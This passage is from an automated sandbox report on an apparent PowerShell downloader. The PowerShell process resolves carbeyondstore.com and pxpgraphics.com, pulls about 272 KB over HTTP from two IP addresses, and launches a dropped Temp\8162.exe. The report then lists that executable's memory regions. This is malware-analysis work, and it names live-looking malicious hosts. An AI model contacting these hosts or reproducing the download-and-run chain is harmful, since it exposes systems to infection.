Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1 Fn
Open Key HKEY_CURRENT_USER\Environment True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1 Fn
Open Key HKEY_CURRENT_USER True 1 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1 Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1 Fn
Read Value HKEY_CURRENT_USER\Environment False 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 4 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds False 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 2 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds False 1 Fn
Process (6)
Operation Additional Information Success Count Logfile
Create C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe False 1
Fn
Create C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Get Info True 1
Fn
Open c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Open c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Memory (38)
Operation Additional Information Success Count Logfile
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 3
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 3
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 17
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Module (7)
Operation Additional Information Success Count Logfile
Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Filename True 1
Fn
Create Mapping filename = System Paging File, protection = PAGE_READWRITE True 1
Fn
Enumerate process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Map process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
COM (2)
Operation Additional Information Success Count Logfile
Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System (6)
Operation Additional Information Success Count Logfile
Mutex (10)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 5
Fn
Open mutex_name = Global\.net clr networking True 5
Fn
Network Behavior
DNS (3)
Operation Additional Information Success Count Logfile
Resolve Name host = carbeyondstore.com, hints = [AddrInfo] True 1
Fn
Resolve Name host = www.carbeyondstore.com, hints = [AddrInfo] True 1
Fn
Resolve Name host = pxpgraphics.com, hints = [AddrInfo] True 1
Fn
TCP Sessions (3)
Information Value
Total Data Sent 0.00 KB (0 bytes)
Total Data Received 272.80 KB (279350 bytes)
Contacted Host Count 2
Contacted Hosts 72.52.246.64:80, 69.65.3.206:80
TCP Session #1
Information Value
Handle 0x54c
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 72.52.246.64
Remote Port 80
Local Address 0.0.0.0
Local Port 2496
Data Sent 0.00 KB (0 bytes)
Data Received 0.33 KB (340 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 72.52.246.64, remote_port = 80 True 1
Fn
Receive flags = NO_FLAG_SET, size = 4096, size_out = 340 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
Information Value
Handle 0x548
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 72.52.246.64
Remote Port 80
Local Address 0.0.0.0
Local Port 2752
Data Sent 0.00 KB (0 bytes)
Data Received 0.57 KB (587 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 72.52.246.64, remote_port = 80 True 1
Fn
Receive flags = NO_FLAG_SET, size = 4096, size_out = 587 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
Information Value
Handle 0x58c
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 69.65.3.206
Remote Port 80
Local Address 0.0.0.0
Local Port 3008
Data Sent 0.00 KB (0 bytes)
Data Received 271.90 KB (278423 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 69.65.3.206, remote_port = 80 True 1
Fn
Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 3164 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 4356 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 5808 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 7260 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 10164 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 13068 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 15972 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 4356 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 18876 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 26136 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 8712 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 6692 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 40656 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 30492 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 60616, size_out = 24684 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 35932, size_out = 4356 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 31576, size_out = 27588 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3988, size_out = 3988 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 3
Fn
Data
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
Process #3: 8162.exe
(Host: 314, Network: 0)
Information Value
ID #3
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:01:18
OS Process Information
Information Value
PID 0xba0
Parent PID 0xa94 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
private_0x00000000001a0000 0x001a0000 0x001a2fff Private Memory Readable, Writable True False False
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory Readable, Writable True False False
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False
locale.nls 0x003a0000 0x00406fff Memory Mapped File Readable False False False
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000540000 0x00540000 0x006c7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006d0000 0x006d0000 0x00850fff Pagefile Backed Memory Readable True False False
private_0x0000000000860000 0x00860000 0x009effff Private Memory Readable, Writable True False False
pagefile_0x0000000000860000 0x00860000 0x0093efff Pagefile Backed Memory Readable True False False
private_0x00000000009b0000 0x009b0000 0x009effff Private Memory Readable, Writable True False False
8162.exe 0x01100000 0x01147fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000001150000 0x01150000 0x0254ffff Pagefile Backed Memory Readable True False False
wow64cpu.dll 0x73f80000 0x73f87fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73f90000 0x73febfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ff0000 0x7402efff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x74c60000 0x74c72fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x75310000 0x7538ffff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x753a0000 0x753abfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x753b0000 0x7540ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75630000 0x7568ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x756c0000 0x757cffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x757d0000 0x757e8fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75800000 0x75845fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75a50000 0x75adffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75c60000 0x75d5ffff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75e80000 0x75f6ffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76fb0000 0x7707bfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x77140000 0x771ebfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x77310000 0x773acfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x773b0000 0x7744ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077450000 0x77450000 0x7756efff Private Memory Readable, Writable, Executable True False False
private_0x0000000077570000 0x77570000 0x77669fff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77670000 0x77818fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x77820000 0x77829fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77850000 0x779cffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Host Behavior
File (255)
